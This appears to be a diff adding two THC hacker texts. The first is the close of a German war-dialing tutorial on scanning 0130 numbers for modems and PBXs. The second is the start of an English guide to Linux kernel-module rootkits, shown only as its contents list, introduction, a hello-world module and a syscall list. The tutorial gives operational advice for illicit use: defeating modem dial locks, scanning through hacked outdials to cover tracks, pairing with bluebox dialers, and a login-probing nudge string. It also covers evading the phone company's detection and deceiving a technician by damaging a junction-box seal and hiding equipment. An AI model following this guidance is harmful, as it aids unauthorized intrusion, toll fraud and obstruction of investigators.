+       Ausserdem wird manchmal eine Stimme vom Modem als BUSY identifiziert,
+       was sich leider nicht vermeiden laesst, aber ein gutes Modem macht
+       auch das seltener. Man kann zudem ganz bei den meisten Modem die BUSY
+       Identifizierung auschalten (AT Xx), der Nachteil ist dann halt, dass
+       man immer selbst im Scanner-Programm B fuer Busy druecken muss.
+
+
+
+     ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+     ³ Die Wahl des Modems und dessen Konfiguration ³
+     ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+   Ja welches Modem soll man nun nehmen?
+   Es sollte auf jedenfall eines mit guter Qualitaet sein, denn manche
+   Modems auf 0130 liegen irgendwo weit weg und es ist viel Rauschen dabei,
+   oder sind alt und wollen einen 1200 Baud Connect was nicht jedes Modem
+   mehr unterstuetzt. Auch reagieren qualitative Modems besser und schneller.
+   Wenn man hauptsaechlich autmatisch scanned, also ohne davor zu sitzen,
+   dann sollte das Modem unbedingt eine VOICE Antwort unterstuetzen.
+   Alte Zyxels oder USR Sportster untersteutzen keine VOICE Antwort.
+   Sehr zu empfehlen sind USR Couriers oder Zyxels, wobei man bei Zyxels,
+   wenn es sich um die 1496er Reihe handelt auf ein aktuelles ROM handeln
+   sollte - ansonsten halt updaten.
+   Ich benutze die Kombination von USR Courier und Zyxel seit langem und finde
+   sie unschlagbar. Oft gibt es Probleme mit z.B. Creatix oder billigen
+   28.8 Modems. Lasst davon lieber die Finger.
+   Wichtig ist es auch, dass ihr ein Modem OHNE Postzulassung kauft, denn sonst
+   ist eine Wahlsperre integriert!
+
+   Zur Konfiguration des Modems : Der Modem-Lautsprecher sollte an sein,
+   wenn ihr davor sitzen wollt beim scannen, ansonsten abgeschaltet.
+   Das S10 Register sollte hoeher gestellt werden, damit man den Carrier
+   nicht verliert wenn das Zielmodem weit entfernt ist.
+   Das S11 Register sollte auf zwischen 60-70 gestellt werden, damit schneller
+   gewaehlt wird.
+   Folgendes sollte bei jedem Modem funktionieren und setzt es in den
+   wahrscheinlich optimalen (generischen) Zustand :    AT &F M3 S10=69 S11=64
+
+   Wer ein Modem mit Wahlsperre hat soll sich aus dem FIDO das Wahlsperren FAQ
+   holen wo fuer viele Modems drinnen steht wie man sie abschaltet.
+   Wenn das Modem eine VOICE Antwort besitzt sollte diese Modus nur einschalten
+   wenn der Computer alleine scannen soll. (AT X? - schaut ins Handbuch)
+
+
+
+     ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+     ³ Wie arbeiten Scanner-Programme, welche gibt es? ³
+     ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+   Mit wenigen Ausnahmen machen alle Programme folgendes :
+   Man traegt seine COM Adresse des Modems ein, sagt von welcher Nummer
+   bis welcher Nummer man scannen will und dann legt das Programm los,
+   und spuckt am Ende eine Liste mit den gefundenen Modems aus.
+   Nur wenige Programme speichern zumindest das, was das andere Modem ausgibt,
+   was im vorfeld sehr hilfreich ist, da man schon sieht womit man es zu tun
+   hat, und dadurch viel Zeit spart, z.B. der Autoscan von POI (poi-as01.zip)
+   und der PHU (phu.zip).
+   Somit stellen diese beiden das absolute Minimum dar, was man, wenn man nur
+   an Modems interessiert ist, benutzen sollte.
+   Moechte man nach PBX scannen, oder online davorsitzen und sich mehr darueber
+   notieren ueber die Nummer, dann muss man schon zum Toneloc v1.1 greifen
+   (tl-110.zip), allerdings sind die Funktionen recht beschraenkt, nur wenige
+   IDs die Nummern zugeordnet werden koennen, ausserdem laeuft es nicht mit
+   allen Computers/Modems. Aber wem solche einfachen Identifizierungen wie
+   Carrier/Fax/Noted/Girl-Voice/Asshole-Voice/Busy reicht, und bei dem es
+   funktioniert, der wird damit zufrieden sein.
+   Wer gerne nochmehr machen moechte, erweiterte ID Moeglichkeiten, besondere
+   Settings braucht, nach speziellen Sachen scanned, etc. etc. der muss zum
+   THC-Scan greifen, ein Konkurrenzprodukt mit auch nur annaehernd gleichem
+   Funktionsumfang gibt es leider nicht. (thc-ts14.zip)
+
+   Wie arbeiten nun solche Programme eigentlich?
+   Nun, das Modem wird zuerst initalisiert, und dann der Nummernbereich, der
+   gescanned werden soll angerufen. Manche machen das Schritt fuer Schritt,
+   andere mit einem Zufallsgenerator. Es wird dann einfach ein "ATDT0130800000"
+   an das Modem gesendet, was dann die Nummer anwaehlt.
+   Wenn nach 30/50/60 Sekunden, je nach Einstellung, keine Antwort vom Modem
+   kommt, ist es ein Timeout, ansonsten wird die Antwort des Modems einer ID
+   zugeordnet wie z.B. BUSY -> Besetzt, VOICE -> Stimme, CONNECT -> Modem, etc.
+   Allerdings speichern die meisten Programme nur CONNECT -> Modem.
+   Toneloc und THC-Scan unterstuetzen ausserdem auch PBX-Scanning.
+   Da sich haeufig die PBXen am Anfang mit einem waehltonaehnlichen Ton melden
+   wird das ausgenutzt, indem man dem Modem den Befehl "ATDT0130800000W;"
+   sendet zum anrufen. Wenn nun ein OK als Antwort kommt hat man eine PBX
+   gefunden, wenn ein NO CARRIER kommt, oder die Zeit ueberschritten wurde
+   war es irgendetwas anderes. Allerdings findet man damit nicht nur PBXen
+   sondern auch Modems, die sich versuchen zu initialsieren und dann auch einen
+   Ton angeben der einem Waehlton aehnelt. So kann man also den Computer
+   alleine nach Modems und PBXs scannen lassen.
+   Angemerkt werden soll noch, dass manche PBXen sich auch nur so aeussern,
+   das sie still sind, um solche zu finden muss man "ATDT0130800000@;" senden,
+   allerdings fuehrt es haeufig zu einer falschen Identifikation.
+   Wie ihr seht, arbeiten solche Programme recht simpel und erst
+   Sonderfunktionen machen etwas Programmieraufwand. Wer also was ganz
+   spezielles braucht, kann es sich leicht selber programmieren.
+
+
+
+     ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+     ³ Tips & Trick zum Scannen ³
+     ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+   þ Manche Firmen haben Nachts statt ihrer Beratungshotline eine VMB
+     laufen, also lohnt es sich sehr wenn man nachts scanned.
+   þ Die Bereiche zum scannen sind riesig, ihr habt also nicht nur mehr
+     davon wenn ihr euch zu ScanTeams zusammentut, sondern lernt ausserdem
+     noch voneinander und seid nicht alleine.
+   þ Wenn man Probleme mit einem Modem/Programm hat, dass es nicht laeuft,
+     einfach vorher einen Fossil Treiber (z.B. x00-202.zip) laden. Wenn
+     das Programm einen solchen ausserdem noch direkt unterstuetzt, dass im
+     Programm anwaehlen.
+   þ Random/Zufaellig oder Sequentiell waehlen : Random ist unauffaelliger,
+     Sequentiell lohnt es sich zu scannen wenn man davor sitzt, weil man
+     dann z.B. ein Gefuehl ueber die Verteilung von Nummern bekommt und
+     ausserdem bemerkt wenn eine Firma mehrere Nummern hintereinander belegt
+     hat.
+   þ Wenn das Modem eine VOICE Antwort zurueckgibt, bevor auch nur die
+     Zielnummer was hineingesprochen haben koennte, dann reagiert das Modem
+     sehr anfaellig auf Rauschen und Stoergeraeusche. Du solltest also bei
+     der Dialmask des Nummernbereiches den du scannst ein ",," anhaengen,
+     also z.B. "0130-80xxxx,,"
+   þ selbiges wenn man Tone-Scanning macht, und zu frueh ein OK zurueckgegeben
+     wird.
+
+
+
+     ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+     ³ Tips zum Benutzen erweiterter Funktionen von THC-Scan ³
+     ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+   Mehr zu den jeweiligen Punkten in der Dokumentation von THC-Scan
+   (thc-scan.doc)
+
+   þ Man kann aus interessanten Textfiles, Word-Dokumenten etc. etc.
+     die Telefonnummern extrahieren (mit extr-no.exe) und sie dann mit
+     der Funktion "Scannen von einer Liste" von THC-Scan inspizieren.
+   þ Wer 2+ Telefonleitungen und Modems hat, kann mit Hilfe der Batchdatei
+     netscan.bat einfach ueber einen Multitasker, oder im Netz verbundenen
+     Rechnern.
+   þ Man man sich einen Modemoutdial gehackt hat (z.B. im Internet), kann man
+     mit dem Kommandozeilenparameter -o diesen zum Scannen benutzen.
+     Verwischt gut die Spuren, ausserdem kann man so leicht und kostenguenstig
+     Bereiche abscannen die einen sonst etwas kosten wuerden.
+   þ Wer noch Blueboxen kann und will und auch erfolgreich ist, kann den
+     besten BB Dialer fuer PCs, den SCAVENGER DIALER (aktuelle Version v0.91)
+     mit dem THC-Scan koppeln, den Scavenger Dialer waehlen lassen und THC-Scan
+     zum Identifizieren benutzen.
+     Aber auch jedes andere Programm kann man das waehlen ueberlassen, z.B.
+     einer Blackbox.
+   þ Bei dem "Autonomen Modus" kann man Ziffern etc. nachwaehlen, was sehr
+     interessant ist, um eine VMB oder PBX schonmal schnell abzuscannen
+   þ Der beste NUDGE String ist 
+     ^~^~^!^~^M^~^M^~^guest^M^~^~guest^M^~^~info^M^~help^M^~^~^~^]^~^M^~^D^~
+     .^M^~@^M^~^A^A^A^~^B^C^E^F^G^H^I^J^K^L^~^N^O^P^Q^R^S^T^U^V^W^X^Y^Z^[^\^~
+   þ Eine Nummer die schon etwas zurueck liegt nochmal anwaehlen? Einfach
+     <BACKSPACE> druecken
+   þ Mit S kann man zu einer Nummer eine Notiz schreiben, was sehr nuetzlich
+     ist. Wenn man *jede* Nummer die man anwaehlt kommentieren will, einfach
+     Alt-S druecken.
+   þ Wenn man eine ganze zeitlang gescanned hat, und viele Nummern Busy waren,
+     und man diese nun nicht mehr scannen will um fertig zu werden, einfach
+     Alt-N druecken.
+   þ Wenn man einen Carrier gefunden hat, und sieht wie der Nudge eingegeben
+     wird plus die Ausgabe des Modems, und dann eingreifen will, einfach Alt-T
+     druecken und selbst Hand anlegen.
+   þ Wer ein gutes Modem besitzt kann im TS-CFG die Modem Controlling Option
+     FAST statt SECURE einstellen, was das scannen beschleunigt.
+   þ Dessen Herz eher an Linux oder FreeBSD/OpenBSD haengt: Man kann THC-Scan
+     wunderbar im Dosemu laufen lassen. Auch mit MsDos Multitaskern gibt es
+     keine Probleme, nur bei Win95 sollte man erst das MsDos aufrufen.
+   þ ... Es gibt noch soviele Funktionen und Optionen, man sollte sich
+     unbedingt die komplette Dokumentation durchlesen und Notizen machen.
+
+
+
+     ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+     ³ Die Gefahren des Scannens ³
+     ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+   Kommen wir nun zu einen sehr interessanten Punkt : Was kann mir beim
+   0130 Scanning eigentlich passieren ?
+   Solange ihr nicht anfangt Nummern zu hacken von der rechtlichen Seite
+   her gesehen nichts.
+   Obwohl die Telekom am Scanning ja selbst verdient scheint es ihr jedoch
+   nicht recht zu sein : Seit jeher hat die Telekom versucht, Leute die viel
+   scannen zu stoeren.
+   Ich kenne 2 Leute, die sehr viel gescanned haben, und bei denen es irgend-
+   wann anfing, dass sie nach Anwahl jeder 2. Telefonnnummer nach den ersten
+   Ziffern sofort ein Besetztzeichen bekamen, sobald sie mit dem Scanning
+   anfingen.
+   Die Telekom tut ausserdem sofort bei Verdacht die Leitungen ueberwachen;
+   im Fall "Luzifer" in Muenchen hatte dieser eine grosse Anzahl von Telefon-
+   leitungen bei der Telekom geordert was diese verdaechtig fanden. Also
+   hoerten sie seine Leitungen ab und protokollierten alles.
+
+   Inzwischen muss die Telekom aber nicht mehr soviel Handarbeit machen,
+   durch ihr Ueberwachungssystem und modernen Vermittlungsstellen kann
+   sie Scanning identifizieren und Massnahmen einleiten.
+   Mehr ueber dieses System in DIESEM MAGAZIN (c7-ueber.thc).
+   Das es eingesetzt wird und auch wirkt laesst sich schoen an einem Fall
+   zeigen, der gerade einmal 3 Wochen zurueck liegt :
+   Ein Freund hatte wieder exzessives 0130 Scanning betrieben, so ca.
+   6 Stunden von 3:00 bis 9:00 morgens. Um 10:00 klingelte das Telefon
+   und eine Telekom-Operator war am Apparat und sagte, dass von dem Anschluss
+   sehr viele Telefonnummern angerufen wurden, dass die Leitung sofort
+   gesperrt wird und erst nach dem Besuch von einem Techniker wieder frei-
+   gegeben wird. Der kam 2 Tage spaeter, hatte Leitungsmessungen durchgefuehrt
+   ob irgendwo eine Unterbrechung ist und ist dann wieder verschwunden.
+
+   Was kann ich machen, um das Risiko der Entdeckung meines Scannings zu
+   minimieren?
+          þ Scanne tagsueber, damit deine Anrufe in dem normalen Telefonver-
+            kehr nicht so auffallen.
+          þ Scanne nicht viele Nummern, ca. 100-300 sollten kein Problem sein.
+          þ Wer kann, sollte das Scanning von dem Anschluss einer Firma aus
+            machen und sich dabei nicht erwischen lassen.
+          þ Die Nummern nach dem Zufallsprinzip anrufen, nicht der Reihe nach.
+          þ Man sollte moeglichst nicht ueber eine ISDN Leitung Scannen,
+            denn wenn man entdeckt wird ist es unwahrscheinlich, dass man der
+            Telekom glauben machen kann jemand haette an der Leitung
+            manipuliert (Durch das ISDN Protokoll kommt sofort ein Alarm,
+            wenn die Leitung unterbrochen wird, und das wird geloggt.)
+          þ THC-Scan : 
+            Benutze die DIAL_SPEED_DELAY und SEND_SPEED_DELAY Funktion im
+            THC-Scan um so zu tun, als wuerde kein Computer waehlen sondern
+            ein Mensch. Setze ausserdem den Wert fuer WAIT_BETWEEN_CALL
+            auf ca. 50000. (Die 3 Sachen sind im TS-CFG zu aendern.)
+            Das alles wird den Scanvorgang sehr stark verlangsamen, aber wenn
+            man eh nur 100-300 Nummern waehlen will und nur den Computer allein
+            scannen lassen will, laesst sich das leicht machen waehrend man
+            bei der Arbeit/Schule ist, der THC-Scan unterstuetzt alle
+            Funktionen fuer automatischen Start/Ende/Anzahl von Anrufen.
+            Folgende Kommandozeile wuerde um 10:00 morgens anfangen, 300
+            Nummern waehlen und sich dann beenden :
+                thc-scan.exe 80-xxxx.dat -m:0130-80xxxx -s:10:00 -#:300
+            Ausserdem hat der THC-Scan seit Version v1.4 ein Jamming Detection,
+            also wenn die Telekom versucht die Leitung zu stoeren. Mehr 
+            dazu in der Dokumentation.
+
+   Was soll ich tun wenn ich entdeckt wurde, und ein Telekom Techniker kommt?
+          þ Behalt die Nerven - du weisst von nix.
+          þ Bevor der Techniker kommt, versuche den Weg Verteilerkasten unten
+            bei dir im Keller so vozubereiten, dass der Techniker den Eindruck
+            bekommt, dass jeder ohne Probleme an den Kasten gehen koennte.
+            Also sich jemand anderes wahrscheinlich in deine Leitung geklinkt
+            hat ... z.B. die Kellertuer offenlassen, das Siegel falls eines
+            am Verteilerkasten ist beschaedigen, etc. etc.
+          þ Vielleicht will er sich die Anschluesse in der Wohnung ansehen,
+            also am besten den Computer vorher zu den Nachbarn stellen,
+            ("Ich will bei mir was streichen und alles ist schon vollgestellt")
+            die Luecken auffuellen so dass nicht auffaellt, dass etwas fehlt.
+          þ Das Scanning danach fuer einige Zeit sein lassen, ggf. die Leitung
+            abmelden und sofort eine neue beantragen.
+
+
+
+     ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
+     ³ Schlusswort ³
+     ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+
+   Wir sind am Ende angelangt, jeder wird nun genug wissen, um sich daran
+   einmal ausprobieren zu koennen.
+   Noch einen letzten Tip: Es lohnt sich auch nicht nur 0130 Nummern zu
+   scannen, sondern auch den Firmenbereich im Ort ... ;-)
+   Ich hoffe dass es den vielen Anfaengern hilft Fuss zu fassen und sie sich
+   entwickeln koennen, damit die deutsche Szene nicht stirbt.
+
+     Ciao...
+                         van Hauser / THC
+
+

Papers/LKM_HACKING.html

@@ -0,0 +1,7959 @@
+<HTML>
+<TITLE>(nearly) Complete Linux Loadable Kernel Modules</title>
+<BODY BGCOLOR=WHITE>
+<CENTER>
+<H1><FONT COLOR=#0000FF>
+                (nearly) Complete Linux Loadable Kernel Modules
+</H1></FONT>
+
+
+<H4>
+ -the definitive guide for hackers, virus coders and system administrators-       
+</H4>
+
+</CENTER>
+<P>
+<H4><FONT COLOR=#FF0000>
+written by pragmatic / THC, version 1.0<br>
+released 03/1999<br>               
+</H4></font>
+
+<P><P><P><P><P><P>
+
+<CENTER>
+<H3>
+                                    CONTENTS
+</H3>
+</CENTER>
+
+
+<A HREF="#Introduction">Introduction</A><BR>
+<P><P>
+<B><U>
+I. Basics<BR>
+</B></U>
+<A HREF="#I.1.">1. What are LKMs</A><BR>
+<A HREF="#I.2.">2. What are Syscalls</A><BR> 
+<A HREF="#I.3.">3. What is the Kernel-Symbol-Table</A><BR> 
+<A HREF="#I.4.">4. How to transform Kernel to User Space Memory</A><BR>
+<A HREF="#I.5.">5. Ways to use user space like functions</A><BR> 
+<A HREF="#I.6.">6. List of daily needed Kernelspace Functions</A><BR>
+<A HREF="#I.7.">7. What is the Kernel-Daemon</A><BR> 
+<A HREF="#I.8.">8. Creating your own Devices</A><BR>
+<P><P>
+<B><U>
+II. Fun & Profit<BR>
+</B></U>
+<A HREF="#II.1.">1. How to intercept Syscalls</A><BR>
+<A HREF="#II.2.">2. Interesting Syscalls to Intercept</A><BR>
+<DD><A HREF="#II.2.1.">2.1  Finding interesting systemcalls (the strace approach)</A><BR></DD>
+<A HREF="#II.3.">3. Confusing the kernel's System Table</A><BR>
+<A HREF="#II.4.">4. Filesystem related Hacks</A><BR>
+<DD><A HREF="#II.4.1."> 4.1  How to Hide Files</A><BR></DD>
+<DD><A HREF="#II.4.2."> 4.2  How to hide the file contents (totally)</A><BR></DD>
+<DD><A HREF="#II.4.3."> 4.3  How to hide certain file parts (a prototype implementation)</A><BR></DD>
+<DD><A HREF="#II.4.4."> 4.4  How to monitor redirect file operations</A><BR></DD>
+<DD><A HREF="#II.4.5."> 4.5  How to avoid any file owner problems</A><BR></DD>
+<DD><A HREF="#II.4.6."> 4.6  How to make a hacker-tools-directory unaccessible</A><BR></DD>
+<DD><A HREF="#II.4.7."> 4.7  How to change CHROOT Environments</A><BR></DD>
+<A HREF="#II.5.">5. Process related Hacks</A><BR>
+<DD><A HREF="#II.5.1."> 5.1  How to hide any process</A><BR></DD>
+<DD><A HREF="#II.5.2."> 5.2  How to redirect Execution of files</A><BR></DD>
+<A HREF="#II.6.">6. Network (Socket) related Hacks</A><BR>
+<DD><A HREF="#II.6.1."> 6.1  How to controll Socket Operations</A><BR></DD>
+<A HREF="#II.7.">7. Ways to TTY Hijacking</A><BR>
+<A HREF="#II.8.">8. Virus writing with LKMs</A><BR>
+<DD><A HREF="#II.8.1."> 8.1  How a LKM virus can infect any file (not just modules; prototype)</A><BR></DD>
+<DD><A HREF="#II.8.2."> 8.2  How can a LKM virus help us to get in</A><BR></DD>
+<A HREF="#II.9.">9. Making our LKM invisible & unremovable</A><BR>
+<A HREF="#II.10.">10.Other ways of abusing the Kerneldaemon</A><BR>
+<A HREF="#II.11.">11.How to check for presents of our LKM</A><BR>
+<P><P>
+<B><U>
+III. Soltutions (for admins)<BR>
+</B></U>
+<A HREF="#III.1.">1. LKM Detector Theory & Ideas</A><BR>
+<DD><A HREF="#III.1.1.">1.1  Practical Example of a prototype Detector</A><BR></DD>
+<DD><A HREF="#III.1.2.">1.2  Practical Example of a prototype password protected create_module(...)</A><BR></DD>
+<A HREF="#III.2.">2. Anti-LKM-Infector ideas</A><BR>
+<A HREF="#III.3.">3 Make your programs untraceable (theory)</A><BR>
+<DD><A HREF="#III.3.1.">3.1  Practical Example of a prototype Anti-Tracer</A><BR></DD>
+<A HREF="#III.3.">4. Hardening the Linux Kernel with LKMs</A><BR>
+<DD><A HREF="#III.4.1."> 4.1  Why should we allow arbitrary programs execution rights? 
+      (route's idea from Phrack implemented as LKM)</A><BR></DD>
+<DD><A HREF="#III.4.2"> 4.2  The Link Patch
+      (Solar Designer's idea from Phrack implemented as LKM)</A><BR></DD>
+<DD><A HREF="#III.4.3."> 4.3  The /proc permission patch
+      (route's idea from Phrack implemented as LKM)</A><BR></DD>
+<DD><A HREF="#III.4.4."> 4.4  The securelevel patch
+      (route's idea from Phrack implemented as LKM)</A><BR></DD>
+<DD><A HREF="#III.4.5."> 4.5  The rawdisk patch</A><BR></DD>
+<P><P>
+<B><U>
+IV. Some Better Ideas (for hackers)<BR>
+</B></U>
+<A HREF="#IV.1.">1. Tricks to beat admin LKMs</A><BR>
+<A HREF="#IV.2.">2. Patching the whole kernel - or creating the Hacker-OS</A><BR>
+<DD><A HREF="#IV.2.1."> 2.1  How to find kernel symbols in /dev/kmem</A><BR></DD>
+<DD><A HREF="#IV.2.2."> 2.2  The new 'insmod' working without kernel support</A><BR></DD>
+<A HREF="#IV.3.">3. Last words</A><BR>
+<P><P>
+<B><U>
+V. The near future : Kernel 2.2<BR>
+</B></U>
+<A HREF="#V.1.">1. Main Difference for LKM writer's</A><BR>
+<P><P>
+<B><U>
+VI. Last Words<BR>
+</B></U>
+<A HREF="#VI.1.">1. The 'LKM story' or 'how to make a system plug & hack compatible'</A><BR>
+<A HREF="#VI.2.">2. Links to other Resources</A><BR>
+<P><P>
+<A HREF="#Acknowledgements">Acknowledgements</A><BR>
+<P><P>
+<A HREF="#Greets">Greets</A><BR>
+<P><P><P><P>
+<B><U>
+Appendix<BR>
+</B></U>
+<P><P>
+<B><U>
+A - Source Codes<BR>
+</B></U>
+
+<DD><A HREF="#A-a">a) LKM Infection <I>by Stealthf0rk/SVAT</I></A><BR></DD>
+<DD><A HREF="#A-b">b) Heroin - the classic one <I>by Runar Jensen</I></A><BR></DD>
+<DD><A HREF="#A-c">c) LKM Hider / Socket Backdoor <I>by plaguez</I></A><BR></DD>
+<DD><A HREF="#A-d">d) LKM TTY hijacking <I>by halflife</I></A><BR></DD>
+<DD><A HREF="#A-e">e) AFHRM - the monitor tool <I>by Michal Zalewski</I></A><BR></DD>
+<DD><A HREF="#A-f">f) CHROOT module trick <I>by FLoW/HISPAHACK</I></A><BR></DD>
+<DD><A HREF="#A-g">g) Kernel Memory Patching <I>by ?</I></A><BR></DD>
+<DD><A HREF="#A-h">h) Module insertion without native support <I>by Silvio Cesare</I></A><BR></DD>
+
+<P><P><P><P>
+<HR SIZE="3" WIDTH="300" ALIGN="CENTER" NOSHADE="NOSHADE">
+<P><P><P><P>
+
+<P>
+<H3><A NAME="Introduction"></A>Introduction</H3>
+<P>
+
+The use of Linux in server environments is growing from second to second. So
+hacking Linux becomes more interesting every day. One of the best techniques to
+attack a Linux system is using kernel code. Due to its feature called Loadable
+Kernel Modules (LKMs) it is possible to write code running in kernel space, which
+allows us to access very sensitive parts of the OS. There were some texts and
+files concerning LKM hacking before (Phrack, for example) which were very good.
+They introduced new ideas, new methodes and complete LKMs doing anything a
+hacker ever dreamed of. Also some public discussion (Newsgroups, Mailinglists)
+in 1998 were very interesting.<BR>
+So why do I write again a text about LKMs. Well there are several reasons :
+<ul>
+<li> former texts did sometimes not give good explanations for kernel beginners;
+  this text has a very big basic section, helping beginners to understand the
+  concepts. I met lots of people using nice exploits/sniffers and so on without
+  even understanding how they work. I included lots of source code in this file
+  with lots of comments, just to help those beginners who know that hacking is
+  more than playing havoc on some networks out there !<br>
+<li> every published text concentrated on a special subject, there was no complete
+  guide for hackers concerning LKMs. This text will cover nearly every aspect of
+  kernel abusing (even virus aspects)<br>
+<li> this texts was written from the hacker / virus coder perspective, but it will
+  also help admins and normal kernel developers doing a better job<br>
+<li> former text showed us the main advantages / methods of abusing LKMs, but
+  there are some things which we have not heard of yet. This text will show
+  some new ideas (nothing totally new, but things which could help us)<br>
+<li> this text will show concepts of some simple ways to protect from LKM attacks<br>
+<li> this text will also show how to defeat LKM protections by using methods like
+  Runtime Kernel Patching<br>
+</ul>
+
+Please remember that new ideas are implemented as prototype modules (just for
+demonstration) which have to be improved in order to use them in the wild.<br>
+The main motivation of this text is giving everyone <i>one</i> big text covering the
+whole LKM problem. In appendix A I give you some existing LKMs plus a short
+description of their working (for beginners) and ways to use them. <br>
+The whole text (except part V) is based on a Linux 2.0.x machine (x86).I tested
+all programs and code fragments. The Linux system must have LKM support for
+using most code examples in this text.  Only part  IV  will show some sources 
+working without native LKM support. Most ideas in this text will also work on
+2.2.x systems (perhaps you'll need some minor modification); but recall that
+kernel 2.2.x was just released (1/99) and most linux distribution still use 
+2.0.x (Redhat, SuSE, Caldera, ...). In April some some distributors like SuSE
+will present their kernel 2.2.x versions; so you won't need to know how to hack
+a 2.2.x kernel at the moment. Good administrators will also wait some months
+in order to get a more reliable 2.2.x kernel. [Note : Most systems just don't 
+need kernel 2.2.x so they will continue using 2.0.x].<br>
+This text has a special section dealing with LKMs helping admins to secure the
+system. You (hacker) should also read this section, you <i>must</i> know everything
+the admins know and even more. You will also get some nice ideas from that
+section that could help you develope more advanced 'hacker-LKMs'. Just read the
+whole text !<br>
+<I><u>And please remember</I></u> : This text was only written for educational purpose. Any
+illegal action based on this text is your own problem.<br>
+
+
+<u><b>
+<H2>I. Basics</H2>
+</u></b>
+<P><P>
+<H3><A NAME="I.1."></A>1. What are LKMs</H3>
+
+
+LKMs are Loadable Kernel Modules used by the Linux kernel to expand his
+functionality. The advantage of those LKMs : <i>The can be loaded dynamically</i>;
+there must be no recompilation of the whole kernel. Because of those features
+they are often used for specific device drivers (or filesystems) such as
+soundcards etc.<br>
+Every LKM consist of two basic functions (minimum) :
+<XMP>
+int init_module(void) /*used for all initialition stuff*/
+{
+
+...
+}
+
+void cleanup_module(void) /*used for a clean shutdown*/
+{
+...
+}
+</XMP>
+
+Loading a module - normally retricted to root - is managed by issuing the
+follwing command:
+
+<xmp>
+# insmod module.o
+</xmp>
+
+This command forces the System to do the following things :
+<ul>
+<li>Load the objectfile (here module.o)<br>
+<li>call create_module systemcall (for systemcalls -> see I.2) for Relocation of
+    memory<br>
+<li>unresolved references are resolved by Kernel-Symbols with the systemcall 
+    get_kernel_syms<br>
+<li>after this the init_module systemcall is used for the LKM initialisation
+    -> executing int init_module(void) etc.<br>
+</ul>
+The Kernel-Symbols are explained in I.3 (Kernel-Symbol-Table).<br>
+So I think we can write our first little LKM just showing how it basicly works:
+
+<xmp>
+#define MODULE
+#include <Linux/module.h>
+
+int init_module(void)
+{
+ printk("<1>Hello World\n");
+ return 0;
+}
+
+void cleanup_module(void)
+{
+ printk("<1>Bye, Bye");
+}
+</xmp>
+
+You may wonder why I used printk(...) not printf(...). Well <i>Kernel-Programming</i>
+is totally different from <i>Userspace-Programming</i> !<br>
+You only have a very restricted set of commands (see I.6). With those commands
+you cannot do much, so you will learn how to use lots of functions you know from
+your userspace applications helping you hacking the kernel. Just be patient, we
+have to do something else before...<br>
+The Example above can easily compiled by
+
+<xmp>
+# gcc -c -O3 helloworld.c
+# insmod helloworld.o
+</xmp>
+
+Ok, our module is loaded and showed us the famous text. Now you can check some
+commands showing you that your LKM really stays in kernel space.<br>
+
+<xmp>
+# lsmod
+Module         Pages    Used by
+helloworld         1	      0
+</xmp>
+
+This command reads the information in /proc/modules for showing you which
+modules are loaded at the moment. 'Pages' is the memory information (how many
+pages does this module fill); the 'Used by' field tells us how often the module
+is used in the System (reference count). The module can only be removed, when
+this counter is zero; after checking this, you can remove your module with
+
+<xmp>
+# rmmod helloworld
+</xmp>
+
+Ok, this was our first little (very little) step towards abusing LKMs. I always
+compared those LKMs to old DOS TSR Programs (yes there are many differences, 
+I know), they were our gate to staying resident in memory and catching every
+interrupt we wanted. Microsoft's WIN 9x has something called VxD, which is 
+also  similar to LKMs (also many differences). The most interesting part of
+those resident programs is the ability to hook system functions, in the Linux
+world called systemcalls.<br>
+
+ 
+<H3><A NAME="I.2."></A>2. What are systemcalls</h3>
+
+I hope you know, that every OS has some functions build into its kernel, which
+are used for every operation on that system.<br>
+The functions Linux uses are called systemcalls. They represent a transition
+from user to kernel space. Opening a file in user space is represented by the
+sys_open systemcall in kernel space. For a complete list of all systemcalls
+available on your System look at /usr/include/sys/syscall.h. The following list
+shows my syscall.h 
+
+<xmp>
+#ifndef	_SYS_SYSCALL_H
+#define	_SYS_SYSCALL_H
+
+#define	SYS_setup		0 /* Used only by init, to get system going. */
+#define SYS_exit		1
+#define SYS_fork		2
+#define SYS_read		3
+#define SYS_write		4
+#define SYS_open		5
+#define SYS_close		6
+#define SYS_waitpid		7
+#define SYS_creat		8
+#define SYS_link		9
+#define SYS_unlink		10
+#define SYS_execve		11
+#define SYS_chdir		12
+#define SYS_time		13
+#define SYS_prev_mknod		14
+#define SYS_chmod		15
+#define SYS_chown		16
+#define SYS_break		17
+#define SYS_oldstat		18
+#define SYS_lseek		19
+#define SYS_getpid		20
+#define SYS_mount		21
+#define SYS_umount		22
+#define SYS_setuid		23
+#define SYS_getuid		24
+#define SYS_stime		25
+#define SYS_ptrace		26
+#define SYS_alarm		27
+#define SYS_oldfstat		28
+#define SYS_pause		29
+#define SYS_utime		30
+#define SYS_stty		31
+#define SYS_gtty		32
+#define SYS_access		33
